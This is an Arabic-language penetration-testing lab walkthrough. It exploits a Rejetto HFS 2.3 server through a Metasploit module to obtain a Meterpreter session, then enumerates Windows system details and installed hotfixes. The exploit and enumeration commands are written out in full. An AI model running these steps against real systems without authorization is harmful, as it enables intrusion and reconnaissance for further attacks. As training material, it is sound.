search

🧪1. تعداد معلومات نظام Windows ( Enumerating Windows System Information)

🎯 الهدف الأساسي: الحصول على وصول مبدئي إلى نظام Windows مستهدف، ثم جمع معلومات مفصلة عن نظام التشغيل وتحديثاته المثبتة (Hotfixes) باستخدام أوامر Meterpreter و Command Shell.

🔧 الأدوات المستخدمة:

  • Nmap

  • Metasploit Framework (MSFConsole)

  • exploit/windows/http/rejetto_hfs_exec (Metasploit module)

  • Meterpreter commands: sysinfo, shell

  • Windows Command Shell commands: hostname, systeminfo, wmic qfe get Caption,Description,HotFixID,InstalledOn

📜 خطوات التنفيذ: اولاً افحص

📊 ثانياً: الاستغلال والحصول على وصول مبدئي (Exploitation & Initial Access) 🗣️ إذا عرفت أن خدمة HTTP File Server 2.3 ضعيفة (Rejetto HFS)، فعليك البحث عن وحدة استغلال (exploit module) لها.

  • إذا نفذت الأمر التالي في Metasploit Framework:

    msfconsole -q
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS [Target IP]
exploit

    🔑 سوف تحصل على جلسة Meterpreter على النظام المستهدف، مما يعني نجاح الاختراق الأولي.

📊 ثالثاً: تعداد معلومات النظام باستخدام Meterpreter و Command Shell (Post-Exploitation - Local Enumeration) 🗣️ الآن بعد أن أصبحت لديك جلسة Meterpreter، يمكنك البدء في جمع معلومات النظام.

  • إذا كتبت الأمر التالي في جلسة Meterpreter:

    sysinfo

    فسوف تحصل على معلومات أساسية مثل اسم الكمبيوتر، نظام التشغيل (Windows Server 2012 R2)، وإصدار البنية (Build)، ومعمارية النظام، واسم النطاق، والمستخدمين المسجلين حالياً.

  • للحصول على معلومات أكثر تفصيلاً، إذا انتقلت إلى واجهة سطر الأوامر (Command Shell) الخاصة بنظام Windows:

    shell

    فسوف تحصل على واجهة Command Prompt (CMD).

  • إذا كتبت الأمر التالي في Command Shell:

    hostname

    فسوف يعرض لك اسم المضيف (hostname) للنظام المستهدف.

  • إذا كتبت الأمر التالي في Command Shell للحصول على معلومات شاملة:

    systeminfo

    فسوف يعرض لك معلومات مفصلة عن نظام التشغيل، وتكوينات الأجهزة، وقائمة "Hotfixes" المثبتة. هذه القائمة مهمة لتحديد الثغرات المصححة أو غير المصححة.

  • للحصول على قائمة منظمة بالتحديثات (Hotfixes) مع تاريخ تثبيتها:

    wmic qfe get Caption,Description,HotFixID,InstalledOn

    فسوف تحصل على جدول يعرض كل تحديث (Hotfix) مع وصفه ورقم تعريفه وتاريخ تثبيته، مما يساعد في تقييم مدى ضعف النظام أو حصانته.

نقاط التحقق:

  • الوصول إلى جلسة Meterpreter.

  • القدرة على تنفيذ sysinfo وعرض المعلومات الأساسية.

  • القدرة على الانتقال إلى Command Shell.

  • عرض مخرجات systeminfo.

  • عرض جدول wmic qfe المنظم للتحديثات.

Previous🔍 تعداد المعلومات المحلية (Local Enumeration)Next🧪2. تعداد مستخدمي ومجموعات Windows Enumerating Windows Users and Groups)

Last updated